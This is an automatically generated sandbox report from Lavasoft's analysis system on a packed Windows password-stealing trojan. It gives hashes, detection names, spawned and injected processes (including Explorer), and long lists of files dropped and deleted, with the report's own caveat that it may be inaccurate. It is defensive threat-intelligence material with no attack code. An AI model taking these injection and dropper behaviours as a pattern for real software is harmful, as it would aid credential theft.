Susp_Dropper (Kaspersky), Trojan.Win32.Swrort.3.FD, mzpefinder_pcap_file.YR, Sinowal.YR, GenericInjector.YR, BackdoorCaphaw_QKKBAL.YR, TrojanPSWZbot.YR (Lavasoft MAS)Behaviour: Trojan-PSW, Trojan, Backdoor
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: e278feec31e3ed63cbe4a7d85517daea
SHA1: 040894a3e4f22f3189a850ff0a36c4c1ad63067d
SHA256: dc864301b3ed3e0fd2be94326b3fb581d1c627ef65247d5cfd8e8174ec1612f5
SSDeep: 6144:Yykr06hjRDWkYTZkdmqSymbyDGT5cM5RkgB809T3pU03HW2:YLr06nWkW8kymsGPqgz9Ty03HJ
Size: 269312 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: BorlandDelphi30, UPolyXv05_v6
Company: no certificate found
Created at: 2015-08-12 17:32:56
Analyzed on: WindowsXP SP3 32-bit
Summary: Trojan-PSW. Trojan program intended for stealing users passwords.
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
%original file name%.exe:1480
mofcomp.exe:3476
WindowsXP-KB968930-x86-ENG.exe:3964
new.exe:3064
net1.exe:2460
tasklist.exe:2264
ngen.exe:3596
ngen.exe:3168
ngen.exe:3676
ngen.exe:3300
ngen.exe:856
ngen.exe:2988
ngen.exe:3172
ngen.exe:1960
ngen.exe:1944
ngen.exe:420
ngen.exe:916
ngen.exe:3936
ngen.exe:3996
ngen.exe:1868
ngen.exe:2188
ngen.exe:2952
ngen.exe:3560
ngen.exe:3224
ngen.exe:1724
ngen.exe:3220
ngen.exe:1976
ngen.exe:2164
ngen.exe:648
update.exe:4040
net.exe:2156
net.exe:2224
net.exe:2416
hostname.exe:1384
PSCustomSetupUtil.exe:620
PSCustomSetupUtil.exe:452
PSCustomSetupUtil.exe:3908
PSCustomSetupUtil.exe:1924
PSCustomSetupUtil.exe:2196
PSCustomSetupUtil.exe:3064
PSCustomSetupUtil.exe:2308
PSCustomSetupUtil.exe:2224
PSCustomSetupUtil.exe:3696
PSCustomSetupUtil.exe:3856
PSCustomSetupUtil.exe:2176
PSCustomSetupUtil.exe:2244
PSCustomSetupUtil.exe:2112
PSCustomSetupUtil.exe:2240
PSCustomSetupUtil.exe:3992
PSCustomSetupUtil.exe:2288
PSCustomSetupUtil.exe:2344
PSCustomSetupUtil.exe:3952
PSCustomSetupUtil.exe:2552
PSCustomSetupUtil.exe:1496
PSCustomSetupUtil.exe:264
PSCustomSetupUtil.exe:1868
PSCustomSetupUtil.exe:1284
PSCustomSetupUtil.exe:2332
PSCustomSetupUtil.exe:2556
PSCustomSetupUtil.exe:2140
ipconfig.exe:1240
yfenaromaf.exe:1664
PSSetupNativeUtils.exe:1932
mscorsvw.exe:4008
mscorsvw.exe:3128
mscorsvw.exe:2592
mscorsvw.exe:2732
mscorsvw.exe:3104
mscorsvw.exe:2284
mscorsvw.exe:3484
mscorsvw.exe:2168
mscorsvw.exe:2072
mscorsvw.exe:3084
mscorsvw.exe:2408
mscorsvw.exe:828
regsvr32.exe:3404
regsvr32.exe:3200
wsmanhttpconfig.exe:3232
wsmanhttpconfig.exe:1960
netsh.exe:2304
bindata865.exe:3088
The Trojan injects its code into the following process(es):
new.exe:3664
regsvr32.exe:3384
regsvr32.exe:3264
Explorer.EXE:1572
Mutexes
The following mutexes were created/opened:No objects were found.
File activity
The process %original file name%.exe:1480 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Application Data\Olifiqtu\yfenaromaf.exe (269 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\tmp1.tmp (4545 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\tmp2.tmp (7385 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\tmpfa60f4ad.bat (177 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\tmp1.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\tmp2.tmp (0 bytes)
The process mofcomp.exe:3476 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%System%\wbem\Logs\mofcomp.log (1814 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\tmpD4.tmp (1 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\tmpD4.tmp (0 bytes)
The process WindowsXP-KB968930-x86-ENG.exe:3964 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\ea4acb66495575d6b9f323\powershell_ise.exe (2526 bytes)
C:\ea4acb66495575d6b9f323\about_transactions.help.txt (1011 bytes)
C:\ea4acb66495575d6b9f323\about_format.ps1xml.help.txt (17 bytes)
C:\ea4acb66495575d6b9f323\wsmplpxy.dll (603 bytes)
C:\ea4acb66495575d6b9f323\windowsremoteshell.adm (12 bytes)
C:\ea4acb66495575d6b9f323\pscustomsetuputil.exe (316 bytes)
C:\ea4acb66495575d6b9f323\about_jobs.help.txt (12 bytes)
C:\ea4acb66495575d6b9f323\$shtdwn$.req (788 bytes)
C:\ea4acb66495575d6b9f323\powershell.exe (7339 bytes)
C:\ea4acb66495575d6b9f323\update\updspapi.dll (5940 bytes)
C:\ea4acb66495575d6b9f323\about_command_syntax.help.txt (5 bytes)
C:\ea4acb66495575d6b9f323\about_bits_cmdlets.help.txt (7 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.commands.diagnostics.dll (998 bytes)
C:\ea4acb66495575d6b9f323\importallmodules.psd1 (438 bytes)
C:\ea4acb66495575d6b9f323\about_functions_advanced.help.txt (3 bytes)
C:\ea4acb66495575d6b9f323\winrm.vbs (2727 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.consolehost.dll-help.xml (900 bytes)
C:\ea4acb66495575d6b9f323\update\update.exe (10748 bytes)
C:\ea4acb66495575d6b9f323\about_job_details.help.txt (824 bytes)
C:\ea4acb66495575d6b9f323\bitstransfer.psd1 (950 bytes)
C:\ea4acb66495575d6b9f323\about_locations.help.txt (794 bytes)
C:\ea4acb66495575d6b9f323\about_comparison_operators.help.txt (11 bytes)
C:\ea4acb66495575d6b9f323\wsmauto.dll (1842 bytes)
C:\ea4acb66495575d6b9f323\about_return.help.txt (3 bytes)
C:\ea4acb66495575d6b9f323\spuninst.exe (3787 bytes)
C:\ea4acb66495575d6b9f323\about_remote.help.txt (7 bytes)
C:\ea4acb66495575d6b9f323\wevtfwd.dll (3351 bytes)
C:\ea4acb66495575d6b9f323\about_wmi_cmdlets.help.txt (8 bytes)
C:\ea4acb66495575d6b9f323\system.management.automation.dll-help.xml (16567 bytes)
C:\ea4acb66495575d6b9f323\about_functions_advanced_parameters.help.txt (962 bytes)
C:\ea4acb66495575d6b9f323\about_arrays.help.txt (8 bytes)
C:\ea4acb66495575d6b9f323\about_trap.help.txt (10 bytes)
C:\ea4acb66495575d6b9f323\about_pssession_details.help.txt (9 bytes)
C:\ea4acb66495575d6b9f323\microsoft.backgroundintelligenttransfer.management.resources.dll (7 bytes)
C:\ea4acb66495575d6b9f323\about_break.help.txt (792 bytes)
C:\ea4acb66495575d6b9f323\registry.format.ps1xml (20 bytes)
C:\ea4acb66495575d6b9f323\spmsg.dll (495 bytes)
C:\ea4acb66495575d6b9f323\filesystem.format.ps1xml (133 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.consolehost.dll (3118 bytes)
C:\ea4acb66495575d6b9f323\diagnostics.format.ps1xml (590 bytes)
C:\ea4acb66495575d6b9f323\about_redirection.help.txt (2 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.commands.utility.dll-help.xml (20810 bytes)
C:\ea4acb66495575d6b9f323\about_aliases.help.txt (6 bytes)
C:\ea4acb66495575d6b9f323\about_operators.help.txt (770 bytes)
C:\ea4acb66495575d6b9f323\microsoft.backgroundintelligenttransfer.management.dll-help.xml (2472 bytes)
C:\ea4acb66495575d6b9f323\about_throw.help.txt (5 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.gpowershell.dll (9738 bytes)
C:\ea4acb66495575d6b9f323\about_debuggers.help.txt (21 bytes)
C:\ea4acb66495575d6b9f323\wsmwmipl.dll (2816 bytes)
C:\ea4acb66495575d6b9f323\about_windows_powershell_2.0.help.txt (453 bytes)
C:\ea4acb66495575d6b9f323\wsmtxt.xsl (2 bytes)
C:\ea4acb66495575d6b9f323\winrm.cmd (35 bytes)
C:\ea4acb66495575d6b9f323\about_split.help.txt (10 bytes)
C:\ea4acb66495575d6b9f323\compiledcomposition.microsoft.powershell.gpowershell.dll (1737 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.commands.utility.resources.dll (508 bytes)
C:\ea4acb66495575d6b9f323\about_history.help.txt (3 bytes)
C:\ea4acb66495575d6b9f323\microsoft.wsman.management.resources.dll (13 bytes)
C:\ea4acb66495575d6b9f323\about_regular_expressions.help.txt (5 bytes)
C:\ea4acb66495575d6b9f323\wsman.format.ps1xml (837 bytes)
C:\ea4acb66495575d6b9f323\about_properties.help.txt (7 bytes)
C:\ea4acb66495575d6b9f323\pwrshplugin.dll (802 bytes)
C:\ea4acb66495575d6b9f323\powershelltrace.format.ps1xml (344 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.commands.management.resources.dll (508 bytes)
C:\ea4acb66495575d6b9f323\about_types.ps1xml.help.txt (481 bytes)
C:\ea4acb66495575d6b9f323\about_signing.help.txt (12 bytes)
C:\ea4acb66495575d6b9f323\about_do.help.txt (2 bytes)
C:\ea4acb66495575d6b9f323\winrm.ini (1956 bytes)
C:\ea4acb66495575d6b9f323\about_script_internationalization.help.txt (9 bytes)
C:\ea4acb66495575d6b9f323\microsoft.wsman.management.dll-help.xml (8740 bytes)
C:\ea4acb66495575d6b9f323\help.format.ps1xml (3947 bytes)
C:\$Directory (800 bytes)
C:\ea4acb66495575d6b9f323\about_windows_powershell_ise.help.txt (6 bytes)
C:\ea4acb66495575d6b9f323\about_arithmetic_operators.help.txt (168 bytes)
C:\ea4acb66495575d6b9f323\about_escape_characters.help.txt (2 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.editor.dll (14450 bytes)
C:\ea4acb66495575d6b9f323\winrshost.exe (22 bytes)
C:\ea4acb66495575d6b9f323\about_remote_output.help.txt (887 bytes)
C:\ea4acb66495575d6b9f323\about_pipelines.help.txt (411 bytes)
C:\ea4acb66495575d6b9f323\microsoft.backgroundintelligenttransfer.management.interop.dll (1532 bytes)
C:\ea4acb66495575d6b9f323\system.management.automation.dll (38414 bytes)
C:\ea4acb66495575d6b9f323\about_remote_jobs.help.txt (13 bytes)
C:\ea4acb66495575d6b9f323\winrsmgr.dll (2 bytes)
C:\ea4acb66495575d6b9f323\wsmprovhost.exe (657 bytes)
C:\ea4acb66495575d6b9f323\about_functions_cmdletbindingattribute.help.txt (3 bytes)
C:\ea4acb66495575d6b9f323\microsoft.backgroundintelligenttransfer.management.dll (1537 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.graphicalhost.dll (4408 bytes)
C:\ea4acb66495575d6b9f323\about_assignment_operators.help.txt (379 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.gpowershell.resources.dll (408 bytes)
C:\ea4acb66495575d6b9f323\windowspowershellhelp.chm (26041 bytes)
C:\ea4acb66495575d6b9f323\about_functions.help.txt (586 bytes)
C:\ea4acb66495575d6b9f323\about_providers.help.txt (59 bytes)
C:\ea4acb66495575d6b9f323\wsmsvc.dll (15909 bytes)
C:\ea4acb66495575d6b9f323\about_type_operators.help.txt (5 bytes)
C:\ea4acb66495575d6b9f323\about_preference_variables.help.txt (37 bytes)
C:\ea4acb66495575d6b9f323\about_eventlogs.help.txt (5 bytes)
C:\ea4acb66495575d6b9f323\about_commonparameters.help.txt (12 bytes)
C:\ea4acb66495575d6b9f323\certificate.format.ps1xml (155 bytes)
C:\ea4acb66495575d6b9f323\about_comment_based_help.help.txt (595 bytes)
C:\ea4acb66495575d6b9f323\about_command_precedence.help.txt (8 bytes)
C:\ea4acb66495575d6b9f323\about_profiles.help.txt (457 bytes)
C:\ea4acb66495575d6b9f323\bitstransfer.format.ps1xml (16 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.security.dll (1145 bytes)
C:\ea4acb66495575d6b9f323\powershell.exe.mui (10 bytes)
C:\ea4acb66495575d6b9f323\about_for.help.txt (146 bytes)
C:\ea4acb66495575d6b9f323\winrs.exe (1154 bytes)
C:\ea4acb66495575d6b9f323\about_prompts.help.txt (7 bytes)
C:\ea4acb66495575d6b9f323\winrssrv.dll (12 bytes)
C:\ea4acb66495575d6b9f323\about_remote_troubleshooting.help.txt (146 bytes)
C:\ea4acb66495575d6b9f323\pwrshsip.dll (24 bytes)
C:\ea4acb66495575d6b9f323\about_try_catch_finally.help.txt (7 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.commands.management.dll (3386 bytes)
C:\ea4acb66495575d6b9f323\about_parsing.help.txt (2 bytes)
C:\ea4acb66495575d6b9f323\about_automatic_variables.help.txt (14 bytes)
C:\ea4acb66495575d6b9f323\microsoft.wsman.management.dll (5010 bytes)
C:\ea4acb66495575d6b9f323\update\spcustom.dll (23 bytes)
C:\ea4acb66495575d6b9f323\about_pssnapins.help.txt (6 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.commands.diagnostics.resources.dll (470 bytes)
C:\ea4acb66495575d6b9f323\about_objects.help.txt (2 bytes)
C:\ea4acb66495575d6b9f323\about_quoting_rules.help.txt (659 bytes)
C:\ea4acb66495575d6b9f323\wsmres.dll (6164 bytes)
C:\ea4acb66495575d6b9f323\update (4 bytes)
C:\ea4acb66495575d6b9f323\about_remote_requirements.help.txt (6 bytes)
C:\ea4acb66495575d6b9f323\about_switch.help.txt (489 bytes)
C:\ea4acb66495575d6b9f323\about_methods.help.txt (6 bytes)
C:\ea4acb66495575d6b9f323\wsmpty.xsl (1 bytes)
C:\ea4acb66495575d6b9f323\about_language_keywords.help.txt (11 bytes)
C:\ea4acb66495575d6b9f323\update\eula.txt (586 bytes)
C:\ea4acb66495575d6b9f323\about_ws-management_cmdlets.help.txt (405 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.editor.resources.dll (562 bytes)
C:\ea4acb66495575d6b9f323\default.help.txt (2 bytes)
C:\ea4acb66495575d6b9f323\getevent.types.ps1xml (15 bytes)
C:\ea4acb66495575d6b9f323\about_continue.help.txt (1 bytes)
C:\ea4acb66495575d6b9f323\about_logical_operators.help.txt (2 bytes)
C:\ea4acb66495575d6b9f323\microsoft.wsman.runtime.dll (33 bytes)
C:\ea4acb66495575d6b9f323\profile.ps1 (772 bytes)
C:\ea4acb66495575d6b9f323\about_script_blocks.help.txt (3 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.security.dll-help.xml (1797 bytes)
C:\ea4acb66495575d6b9f323\spupdsvc.exe (287 bytes)
C:\ea4acb66495575d6b9f323\about_session_configurations.help.txt (276 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.consolehost.resources.dll (778 bytes)
C:\ea4acb66495575d6b9f323\about_scripts.help.txt (12 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.commands.utility.dll (9684 bytes)
C:\ea4acb66495575d6b9f323\eventforwarding.adm (2 bytes)
C:\ea4acb66495575d6b9f323\about_foreach.help.txt (10 bytes)
C:\ea4acb66495575d6b9f323\about_execution_policies.help.txt (13 bytes)
C:\ea4acb66495575d6b9f323\powershellcore.format.ps1xml (1492 bytes)
C:\ea4acb66495575d6b9f323\winrmprov.dll (591 bytes)
C:\ea4acb66495575d6b9f323\dotnettypes.format.ps1xml (266 bytes)
C:\ea4acb66495575d6b9f323\about_join.help.txt (2 bytes)
C:\ea4acb66495575d6b9f323\about_ref.help.txt (1 bytes)
C:\ea4acb66495575d6b9f323\winrscmd.dll (2907 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.commands.diagnostics.dll-help.xml (2301 bytes)
C:\ea4acb66495575d6b9f323\about_special_characters.help.txt (3 bytes)
C:\ea4acb66495575d6b9f323\types.ps1xml (2510 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.commands.management.dll-help.xml (28236 bytes)
C:\ea4acb66495575d6b9f323\about_while.help.txt (2 bytes)
C:\ea4acb66495575d6b9f323\windowsremotemanagement.adm (574 bytes)
C:\ea4acb66495575d6b9f323\about_hash_tables.help.txt (6 bytes)
C:\ea4acb66495575d6b9f323\about_wildcards.help.txt (3 bytes)
C:\ea4acb66495575d6b9f323\about_reserved_words.help.txt (1 bytes)
C:\ea4acb66495575d6b9f323\wsmanhttpconfig.exe (3009 bytes)
C:\ea4acb66495575d6b9f323\update\update.inf (2457 bytes)
C:\ea4acb66495575d6b9f323\system.management.automation.resources.dll (3153 bytes)
C:\ea4acb66495575d6b9f323\pssetupnativeutils.exe (9 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.security.resources.dll (9 bytes)
C:\ea4acb66495575d6b9f323\powershell_ise.resources.dll (4 bytes)
C:\ea4acb66495575d6b9f323\about_functions_advanced_methods.help.txt (9 bytes)
C:\ea4acb66495575d6b9f323\wtrinstaller.ico (4803 bytes)
C:\ea4acb66495575d6b9f323\about_environment_variables.help.txt (417 bytes)
C:\ea4acb66495575d6b9f323\update\kb968930xp.cat (512 bytes)
C:\ea4acb66495575d6b9f323\about_remote_faq.help.txt (775 bytes)
C:\ea4acb66495575d6b9f323\about_variables.help.txt (6 bytes)
C:\ea4acb66495575d6b9f323\update\update.ver (14 bytes)
C:\ea4acb66495575d6b9f323\about_data_sections.help.txt (5 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.graphicalhost.resources.dll (16 bytes)
C:\ea4acb66495575d6b9f323\winrmprov.mof (789 bytes)
C:\ea4acb66495575d6b9f323\about_requires.help.txt (2 bytes)
C:\ea4acb66495575d6b9f323\wsmauto.mof (4 bytes)
C:\ea4acb66495575d6b9f323\about_line_editing.help.txt (1 bytes)
C:\ea4acb66495575d6b9f323\about_core_commands.help.txt (221 bytes)
C:\ea4acb66495575d6b9f323\about_path_syntax.help.txt (5 bytes)
C:\ea4acb66495575d6b9f323\about_scopes.help.txt (76 bytes)
C:\ea4acb66495575d6b9f323\pspluginwkr.dll (1756 bytes)
C:\ea4acb66495575d6b9f323\about_modules.help.txt (13 bytes)
C:\ea4acb66495575d6b9f323\about_if.help.txt (3 bytes)
C:\ea4acb66495575d6b9f323\about_pssessions.help.txt (9 bytes)
C:\ea4acb66495575d6b9f323\pwrshmsg.dll (4 bytes)
C:\ea4acb66495575d6b9f323\about_parameters.help.txt (9 bytes)
The Trojan deletes the following file(s):
C:\ea4acb66495575d6b9f323\about_transactions.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\powershell_ise.exe (0 bytes)
C:\ea4acb66495575d6b9f323\about_format.ps1xml.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\wsmplpxy.dll (0 bytes)
C:\ea4acb66495575d6b9f323\windowsremoteshell.adm (0 bytes)
C:\ea4acb66495575d6b9f323\pscustomsetuputil.exe (0 bytes)
C:\ea4acb66495575d6b9f323\about_return.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\powershell.exe (0 bytes)
C:\ea4acb66495575d6b9f323\update\updspapi.dll (0 bytes)
C:\ea4acb66495575d6b9f323\about_command_syntax.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\about_bits_cmdlets.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.commands.diagnostics.dll (0 bytes)
C:\ea4acb66495575d6b9f323\importallmodules.psd1 (0 bytes)
C:\ea4acb66495575d6b9f323\about_functions_advanced.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\winrm.vbs (0 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.consolehost.dll-help.xml (0 bytes)
C:\ea4acb66495575d6b9f323\microsoft.wsman.management.dll-help.xml (0 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.commands.management.resources.dll (0 bytes)
C:\ea4acb66495575d6b9f323\about_job_details.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.commands.management.dll (0 bytes)
C:\ea4acb66495575d6b9f323\bitstransfer.psd1 (0 bytes)
C:\ea4acb66495575d6b9f323\about_locations.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\getevent.types.ps1xml (0 bytes)
C:\ea4acb66495575d6b9f323\wsmauto.dll (0 bytes)
C:\ea4acb66495575d6b9f323\about_jobs.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\spuninst.exe (0 bytes)
C:\ea4acb66495575d6b9f323\about_session_configurations.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\pssetupnativeutils.exe (0 bytes)
C:\ea4acb66495575d6b9f323\about_wmi_cmdlets.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\system.management.automation.dll-help.xml (0 bytes)
C:\ea4acb66495575d6b9f323\about_functions_advanced_parameters.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\about_arrays.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\about_trap.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\about_pssession_details.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\about_path_syntax.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\about_break.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\registry.format.ps1xml (0 bytes)
C:\ea4acb66495575d6b9f323\microsoft.backgroundintelligenttransfer.management.resources.dll (0 bytes)
C:\ea4acb66495575d6b9f323\filesystem.format.ps1xml (0 bytes)
C:\ea4acb66495575d6b9f323\about_functions_advanced_methods.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.consolehost.dll (0 bytes)
C:\ea4acb66495575d6b9f323\about_throw.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\about_redirection.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.commands.utility.dll-help.xml (0 bytes)
C:\ea4acb66495575d6b9f323\about_regular_expressions.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\microsoft.backgroundintelligenttransfer.management.dll-help.xml (0 bytes)
C:\ea4acb66495575d6b9f323\diagnostics.format.ps1xml (0 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.gpowershell.dll (0 bytes)
C:\ea4acb66495575d6b9f323\about_debuggers.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\wsmwmipl.dll (0 bytes)
C:\ea4acb66495575d6b9f323\about_windows_powershell_2.0.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\wsmtxt.xsl (0 bytes)
C:\ea4acb66495575d6b9f323\winrm.cmd (0 bytes)
C:\ea4acb66495575d6b9f323\about_split.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\compiledcomposition.microsoft.powershell.gpowershell.dll (0 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.commands.utility.resources.dll (0 bytes)
C:\ea4acb66495575d6b9f323\spmsg.dll (0 bytes)
C:\ea4acb66495575d6b9f323\about_history.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\about_environment_variables.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\about_aliases.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\wsman.format.ps1xml (0 bytes)
C:\ea4acb66495575d6b9f323\about_properties.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\about_wildcards.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\powershelltrace.format.ps1xml (0 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.commands.utility.dll (0 bytes)
C:\ea4acb66495575d6b9f323\about_signing.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\about_do.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\winrm.ini (0 bytes)
C:\ea4acb66495575d6b9f323\about_script_internationalization.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\update\update.exe (0 bytes)
C:\ea4acb66495575d6b9f323\help.format.ps1xml (0 bytes)
C:\ea4acb66495575d6b9f323\about_arithmetic_operators.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\about_escape_characters.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\about_remote_output.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\winrshost.exe (0 bytes)
C:\ea4acb66495575d6b9f323\microsoft.wsman.management.dll (0 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.editor.dll (0 bytes)
C:\ea4acb66495575d6b9f323\about_pipelines.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\powershell.exe.mui (0 bytes)
C:\ea4acb66495575d6b9f323\system.management.automation.dll (0 bytes)
C:\ea4acb66495575d6b9f323\about_remote_jobs.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\about_parsing.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\wsmprovhost.exe (0 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.consolehost.resources.dll (0 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.graphicalhost.dll (0 bytes)
C:\ea4acb66495575d6b9f323\about_assignment_operators.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.commands.diagnostics.dll-help.xml (0 bytes)
C:\ea4acb66495575d6b9f323\types.ps1xml (0 bytes)
C:\ea4acb66495575d6b9f323\about_functions.help.txt (0 bytes)
C:\_521718_ (0 bytes)
C:\ea4acb66495575d6b9f323\about_providers.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\wsmsvc.dll (0 bytes)
C:\ea4acb66495575d6b9f323\about_type_operators.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\about_preference_variables.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\microsoft.backgroundintelligenttransfer.management.dll (0 bytes)
C:\ea4acb66495575d6b9f323\pwrshsip.dll (0 bytes)
C:\ea4acb66495575d6b9f323\about_commonparameters.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\certificate.format.ps1xml (0 bytes)
C:\ea4acb66495575d6b9f323\about_comment_based_help.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\wevtfwd.dll (0 bytes)
C:\ea4acb66495575d6b9f323\about_command_precedence.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\about_profiles.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\bitstransfer.format.ps1xml (0 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.security.dll (0 bytes)
C:\ea4acb66495575d6b9f323\microsoft.backgroundintelligenttransfer.management.interop.dll (0 bytes)
C:\ea4acb66495575d6b9f323\about_for.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\winrs.exe (0 bytes)
C:\ea4acb66495575d6b9f323\about_prompts.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\winrssrv.dll (0 bytes)
C:\ea4acb66495575d6b9f323\about_remote_troubleshooting.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\about_eventlogs.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\about_try_catch_finally.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\about_special_characters.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\winrsmgr.dll (0 bytes)
C:\ea4acb66495575d6b9f323\about_automatic_variables.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\about_windows_powershell_ise.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\update\spcustom.dll (0 bytes)
C:\ea4acb66495575d6b9f323\about_pssnapins.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.commands.diagnostics.resources.dll (0 bytes)
C:\ea4acb66495575d6b9f323\about_objects.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\winrscmd.dll (0 bytes)
C:\ea4acb66495575d6b9f323\update (0 bytes)
C:\ea4acb66495575d6b9f323\about_remote_requirements.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\about_switch.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\about_methods.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\wsmpty.xsl (0 bytes)
C:\ea4acb66495575d6b9f323\about_language_keywords.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\update\eula.txt (0 bytes)
C:\ea4acb66495575d6b9f323\about_ws-management_cmdlets.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.editor.resources.dll (0 bytes)
C:\ea4acb66495575d6b9f323\default.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\about_comparison_operators.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\about_continue.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\about_logical_operators.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\microsoft.wsman.runtime.dll (0 bytes)
C:\ea4acb66495575d6b9f323\profile.ps1 (0 bytes)
C:\ea4acb66495575d6b9f323\about_script_blocks.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.security.dll-help.xml (0 bytes)
C:\ea4acb66495575d6b9f323\spupdsvc.exe (0 bytes)
C:\ea4acb66495575d6b9f323\about_remote.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\about_types.ps1xml.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\about_scripts.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\microsoft.wsman.management.resources.dll (0 bytes)
C:\ea4acb66495575d6b9f323\eventforwarding.adm (0 bytes)
C:\ea4acb66495575d6b9f323\about_foreach.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\about_execution_policies.help.txt (0 bytes)
